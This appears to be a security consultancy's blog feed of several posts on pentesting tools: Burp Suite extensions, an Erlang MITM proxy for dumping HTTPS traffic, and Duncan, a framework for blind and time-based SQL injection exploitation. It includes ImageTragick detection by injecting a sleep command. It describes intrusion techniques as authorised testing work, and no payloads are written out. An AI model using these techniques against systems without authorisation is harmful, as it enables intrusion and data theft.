Not so unique snowflakes

Author: dnet

When faced with the problem of identifying entities, most people reach for incremental IDs. Since this requires a central actor to avoid duplicates and can be easily guessed, many solutions depend on UUIDs or GUIDs (universally / globally unique identifiers). However, although being unique solves the first problem, it doesn’t necessarily cover the second. We’ll present our new solution for detecting such issues in web projects in the form of an extension for Burp Suite Pro below.

(more…)


Beyond detection: exploiting blind SQL injections with Burp Collaborator

Author: dnet

It’s been a steady trend that most of our pentest projects revolve around web applications and/or involve database backends. The former part is usually made much easier by Burp Suite, which has a built-in scanner capable of identifying (among others) injections regarding latter. However, detection is only half of the work needed to be done; a good pentester will use a SQL injection or similar database-related security hole to widen the coverage of the test (obviously within the project scope). Burp continually improves its scanning engine but provides no means to this further exploitation of these vulnerabilities, so in addition to manual testing, most pentesters use standalone tools. With the new features available since Burp Suite 1.7.09, we’ve found a way to combine the unique talents of Burp with our database exploitation framework, resulting in pretty interesting functionality.

(more…)


Accessing local variables in ProGuarded Android apps

Author: dnet

Debugging applications without access to the source code always has its problems, especially with debuggers that were built with developers in mind, who obviously don’t have this restriction. In one of our Android app security projects, we had to attach a debugger to the app to step through heavily obfuscated code.

(more…)


Detecting ImageTragick with Burp Suite Pro

Author: dnet

After ImageTragick (CVE-2016–3714) was published, we immediately started thinking about detecting it with Burp, which we usually use for web application testing. Although collaborator would be a perfect fit, as image processing can happen out-of-band, there’s no official way to tap into that functionality from an extension.

The next best thing is timing, where we try to detect remote code execution by injecting the sleep command which delays execution for a specified amount of seconds. By measuring the time it takes to serve a response without and the with the injected content, the difference tells us whether the code actually got executed by the server.

We used rce1.jpg from the ImageTragick PoC collection and modified it to fit our needs. By calling System.nanoTime() before and after the requests and subtracting the values, the time it took for the server to respond could be measured precisely.

Since we already had a Burp extension for image-related issues, this was modified to include an active scan option that detects ImageTragick. The JPEG/PNG/GIF detection part was reused so that it could detect if any parameters contain images, and if so, it replaces each (one at a time) with the modified rce1.jpg payload. The code was released as v0.3 and can be downloaded either in source format (under MIT license) or a compiled JAR for easier usage. Below is an example of a successful detection:

issue screenshot

Header image © Tomas Castelazo, www.tomascastelazo.com / Wikimedia Commons / CC-BY-SA-3.0


iOS HTTP cache analysis for abusing APIs and forensics

Author: dnet

We’ve tested a number of iOS apps in the last few years, and got to the conclusion that most developers follow the recommendation to use APIs already in the system – instead of reinventing the wheel or unnecessarily depending on third party libraries. This affects HTTP backend APIs as well, and quite a few apps use the built-in NSURLRequest class to handle HTTP requests.

However, this results in a disk cache being created, with a similar structure to the one Safari uses. And if the server doesn’t set the appropriate Cache-Control headers this can result in sensitive information being stored in a plaintext database.

Like others in the field of smartphone app security testing, we’ve also discovered such databases within the sandbox and included it in the report as an issue. However, it can also be helpful for further analysis involving the API and for forensic purposes. Still, there were no ready to use tools, which is problematic in such a convoluted format.

The cache can usually be found in Library/Caches/[id]/Cache.db where [id] is application-specific, and is a standard SQLite 3 database, as it can be seen below.

$ sqlite3 Cache.db
SQLite version 3.12.1 2016-04-08 15:09:49
Enter ".help" for usage hints.
sqlite> .tables
cfurl_cache_blob_data       cfurl_cache_response
cfurl_cache_receiver_data   cfurl_cache_schema_version

Within these tables, all the information can be found that can be used to reconstruct the requests issued by the app along with the responses. (Well, almost; in practice, the lack of HTTP version and status text is not a big problem.)

Since we use Burp Suite for HTTP-related projects (web applications and SOAP/REST APIs), an obvious solution was to develop a Burp plugin that could read such a database and present the requests and responses within Burp for analysis and using it in other modules such as Repeater, Intruder or Scanner.

As the database is an SQLite one, the quest began with choosing a JDBC driver that supports it; SQLiteJDBC seemed to be a good choice, however it uses precompiled binaries for some platforms, which limits its compatibility. After the first few tests it also became apparent that quite a few parts of JDBC is not implemented, including the handling of BLOBs (raw byte arrays, optimal choice for storing complex structures not designed for direct human consumption). The quick workaround was to use HEX(foo) which results in a hexadecimal string of the blob foo, and then parsing it in the client.

BLOBs were used for almost all purposes; request and response bodies were stored verbatim (although without HTTP Content Encoding applied, see later), while request and response metadata like headers and the HTTP verb used were serialized into binary property lists, a format common on Apple systems. For the latter, we needed to find a parser, which was made harder by the fact that most solutions (be it code or forum responses) expected the XML-based representation (which is trivial to handle in any language) while in this case the more compact binary form was used. Although there are utilities to convert between these two (plutil, plistutil and others), I didn’t want to add an external command line dependencies and spawn several processes for every request.

Fortunately, I found a project called Quaqua that had a class for parsing the binary format. Although it also tried converting the object tree to the XML format, a bit of modification fixed this as well.

With these in place, I could easily convert the metadata to HTTP headers, and append the appropriate bodies (if present). For UI, I got inspiration from Logger++ but used a much simpler list for enumerating the requests, since I wanted a working prototype first. (Pull requests regarding this are welcome!)

Most of the work was solving small quirks, for example as I mentioned, HTTP Content Encoding (such as gzip) was stripped before saving the body, however the headers referred to the encoded payload, so both the Content-Length and the Content-Encoding headers needed to be removed, and former had to be filled based on the decoded (“unencoded”) body.

Below is a screenshot of the plugin in action, some values had been masked to protect the innocent.

screenshot of the plugin

The source code is available on GitHub under MIT license, with pre-built JAR binaries downloadable from the releases page.

Featured image is Apfelteiler by Frank C. Müller licensed under CC BY-SA


Proxying nonstandard HTTPS traffic

Author: dnet

Depending on the time spent in IT, most professionals have seen an instance of two where developers based their implementations on specific quirks and other non-standard behaviors, a well-known example is greylisting, another oft-used but less-known one is Wi-Fi band steering. In all these cases, the solution works within a range of implementations, which usually covers most client needs. However, just one step outside that range can result in lengthy investigations regarding how such a simple thing like sending an e-mail or joining a Wi-Fi network can go wrong.

During one of our application security assessments, we found an implementation which abused the way HTTP worked. The functionality required server push, but they probably decided to use HTTP anyway to get through corporate firewalls, and the application came from the age before WebSockets and HTTP2. So they came up with the idea of sending headers like the one below, then keeping the connection open, without sending any data.

HTTP/1.0 200 OK
Server: IDealRelay
Date: Wed, 16 Sep 2015 18:03:24 GMT
Content-length: 10000000
Connection: close
Content-type: text/plain

Googling the value of the Server header revealed mostly false positives, however as it turned out, there’s even a patent US 7734791 B2 with the title Asynchronous hypertext messaging that describes this behavior. Sending data to the server happened over separate HTTP channels, which themselves returned worthless responses, and the real response arrived in the first HTTP channel promising to deliver 10 megabytes in its Content-length header.

Some corporate proxies might have handled this well, however the Proxy module of Burp Suite just waited for the full 10 MB to arrive and just hung there, waiting for all eternity – and even if it managed to receive some data, its Scanner module couldn’t have handled the correlation between sending a payload in one request and getting response in another. In order to solve the problem, I decided to throw together a simple HTTPS proxy that doesn’t assume that much about the contents, just accepts CONNECT requests, performs a Man-in-the-Middle (MITM) attack and dumps the plaintext traffic into a file.

Multiple streams needed to be handled asynchronously, so I chose Erlang for its unique properties, and used built-in modules for everything except generating fake certificates for MITM. Since such certificates are cached, I chose to sign them using the command line version of OpenSSL for the sake of simplicity, so a whitelist is applied to the hostname to avoid command injection attacks – even though it’s supposed to be a tool used to debug “well behaving” applications, it never hurts to protect and setting good example. As an output format, PCAP was chosen as it’s simple (the PCAP writer itself is 32 lines of Erlang code) and widely supported by tools such as Wireshark.

The proxy logic fits into 124 lines of code, and waits for new TCP connections. By setting the socket into HTTP mode, the standard library does all the parsing for the CONNECT request. A standard response is sent, and from this point, the mode gets changed back to raw, and both the server and the client gets an SSL handshake from the proxy. Server certificates used for MITM are cached in an ETS (built-in high-performance in-memory database) table, shared between the lightweight thread-like Erlang processes, so certificates are signed only once per hostname, and the private key is the same for the CA and all the certificates.

After the handshake traffic is simply forwarded between the peers, and simultaneously written into the PCAP file. TCP/IP headers are added with the same port/address tuple as the original stream, while sequence/acknowledgement values are adjusted to reflect the plaintext content. This way, Wireshark doesn’t have any problems with reassembling the stream and can even detect and dissect known application protocols. Source code of the SSL proxy is available in our GitHub repository under MIT license, pull requests are welcome.

With the plaintext traffic in our hands, we managed to develop another tool to experiment with the service and as a result, we found several vulnerabilities, including critical ones. So the lesson to learn is that just because tools cannot intercept traffic out of the box, it doesn’t mean that the application is secure – existing tools are great for lots of purposes but one big difference between hackers and script kiddies is the ability of former to develop their own tools.


Testing websites using ASP.NET Forms Authentication with Burp Suite

Author: dnet

Testing a website is usually considered just another day at work, Burp Suite is usually the tool of our choice for automating some of the scans that apply in this field. Assessing the authenticated part of the site is also common, and since Burp can be used as an HTTP proxy, it can capture our session tokens (usually HTTP cookies) and perform scans just like we’d do as humans. This token is usually remain unchanged over the time of the session, and the session itself is kept alive by the scanner activity itself.

However, a few weeks ago, we encountered an ASP.NET site that offered the regular ASP.NET_SessionId cookie and after successful login we got another one called .ASPXFORMSAUTH indicating that the application uses Forms Authentication. We started issuing requests including these two cookies, but within 5 minutes, the server started responding like we’re not logged in. Investigation followed, and we could reproduce that even by sending a request every 10 seconds, after 2 minutes pass from login, the requests with the two original cookies are denied. The operators confirmed that the session timeout is 2 minutes (which is resonable given the normal use-cases of the application), and looking at the responses revealed that around halfway between login and the 2 minutes deadline, a new .ASPXFORMSAUTH cookie is set by the server.

Apparently, Burp Suite ignored such Set-Cookie headers at the time both in its Scanner and Intruder modules, so I wrote a simple plugin that would hook HTTP requests within Burp and behave like a browser for this specific cookie. If such a cookie is received it gets stored as a protected field of the class, and subsequent requests will be modified to include the latest value. Since Burp uses multiple threads, this value also needs locking in order to avoid race conditions. Burp also offers some help with parsing and mangling HTTP headers, so besides hooking HTTP traffic and initialization, the plugin starts by storing a reference to an instance of the IExtensionHelpers interface.

public class BurpExtender implements IBurpExtender, IHttpListener
{
  protected IExtensionHelpers helpers;
  protected String cookie_value = null;
  public static final String COOKIE_NAME = ".ASPXFORMSAUTH";
 
  @Override
  public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
  {
    helpers = callbacks.getHelpers();
    callbacks.setExtensionName("AspxFormAuth");
    callbacks.registerHttpListener(this);
  }

By registering a HTTP listener, the processHttpMessage method will be called by Burp every time an HTTP request is issued, regardless of its source, including the browser, the Scanner or Intruder modules. The messageIsRequest parameter can be used to define different behavior for requests and responses; in case of former, any Cookie: headers with the matching name in the request will be updated to the latest value (if there’s one, hence the null check).

@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo)
{
  if (messageIsRequest)
  {
    synchronized (this) {
      if (cookie_value == null) return;
    }
    byte[] request = messageInfo.getRequest();
    IRequestInfo ri = helpers.analyzeRequest(request);
    List parameters = ri.getParameters();
    for (IParameter parameter : parameters) {
      if (parameter.getType() == IParameter.PARAM_COOKIE &&
          parameter.getName().equals(COOKIE_NAME)) {
        synchronized (this) {
          messageInfo.setRequest(helpers.updateParameter(request,
                helpers.buildParameter(COOKIE_NAME, cookie_value,
                  IParameter.PARAM_COOKIE)));
        }
      }
    }
  }

The only remaining task is feeding the cookie_value member with tokens by parsing responses. Again, the Burp helpers are used to analyze the headers and if a cookie with a matching name is found, its value is stored, taking special care to let only a single thread access the value at a time.

else
{
  IResponseInfo ri = helpers.analyzeResponse(messageInfo.getResponse());
  List cookies = ri.getCookies();
  for (ICookie cookie : cookies) {
    if (cookie.getName().equals(COOKIE_NAME)) {
      synchronized (this) {
        cookie_value = cookie.getValue();
      }
    }
  }
}

Using this technique, we’d been able to perform the assessment, the full source code can be found in a branch of our GitHub repository. If you don’t want to compile it for yourself, a binary JAR is also available on the release page. We’re also proud that since we released the Burp OAuth plugin this one is based on, former has been built upon and improved by SecureIdeas as part of their Co2 plugin.


Duncan – Expensive injections

Author: b

During a web application test one of the most precious bugs you can find is a good-old SQL injection: These vulnerabilities can lead you to bypass all the security controls of the application, elevate your privileges and find new (possibly vulnerable) functionality and in the end take control over the entire database server and possibly pivot your attack to the depths of the target network.

Fortunately for the application operators SQL injection vulnerabilities are not that easy to come by thanks to the roboust development frameworks and smart testing tools. That being said, these vulnerabilities are here to stay, although many times you can only discover them the hard manual way hidden deep inside some complex feature. After the discovery, exploitation can be more painful, since information emitted by the database often disappears as it goes through the layers of the application, leaving you with a fully blind scenario. And although there are great generic tools (like SQLmap or SQLninja) to retreive meaningful information by gaining advantage of these bugs, there are many cases when configuring or even patching your favorite software takes more effort in the end than writing your specific exploit from scratch.

But we, computer people are lazy and hate to reinvent the wheel every time we stumble upon some exotic injection not to mention the debugging frenzy that a speed-coded search algorithm or a multi-threaded program can cause.

This is why I created Duncan (named after the blind, weak but loyal attendant of the Prince of Thieves) that is a simple but powerful Python program skeleton/module that saves you the work with the most daunting tasks of SQLi exploit development: it takes care of threading, implements tested search algorithms and provides a convenient command line interface (that might be an oxymoron…) for configuration. You only have to implement one single method that checks for the value of a character of a custom query result (typically this can be done in 5-8 lines of code) and you can start looting, Duncan takes care of everything else.

Good old Duncan

Time == Money

Among the simple blind injection – that was really just an exercise to clean the rust off the coder part of my brain – I also wanted to support time-based injections, which may look identical to a standard blind injection but there might be a catch:

While typical blind injections are usually exploitable through some kind of 1-bit information leak and are basically identical to the well-known number guessing game, time based injection has an interesting property, namely that you have to “pay some price” (spend considerable amount of time) every time you guess (in)correctly. Optimizing an exploit to minimize this cost sounded like a fun idea to play with, so I brought up the topic at Camp0 where we created a simple test program and some proof of concept algorithms (the algorithms are named after my participating friends, CJ and Synapse – kudos to them!).

We concluded, that as the set of possible guesses shrink, linear search gets more  beneficial than binary since in the former case the number of expensive guesses is constant (but you have to make more cheap requests overall), while in the latter case we can expect that the number of expensive requests will be proportional to the logarithm of the set size (but we have to make fewer requests overall).

So basically both implemented algorithms fall back to linear search under different conditions related to the set size and the ratio of the costs of the correct/incorrect guesses.

This works pretty well in model implementations, saving 20-30% time in average so I decided to implement a similar algorithm in Duncan too.

Unfortunately as it turned out optimizations only made a (positive) difference in some unlikely edge cases and implementing some simple auto-tuning mechanism for timing could have much bigger benefits. Luckily Duncan allows you to implement such more advanced algorithms pretty easily :)

Update 2017.01.03: After 3 years, Erick Wong from Mathematics Stack Exchange provided us with a comprehensive answer to this problem. As it turned out, “the optimized algorithm can yield significant performance gain in case the penalty is big (e.g. querying a large dataset)”

So feel free to use Duncan in your own pentest projects or experiment with more advanced algorithms, the source code along with some implementation and usage examples are available in our GitHub repository.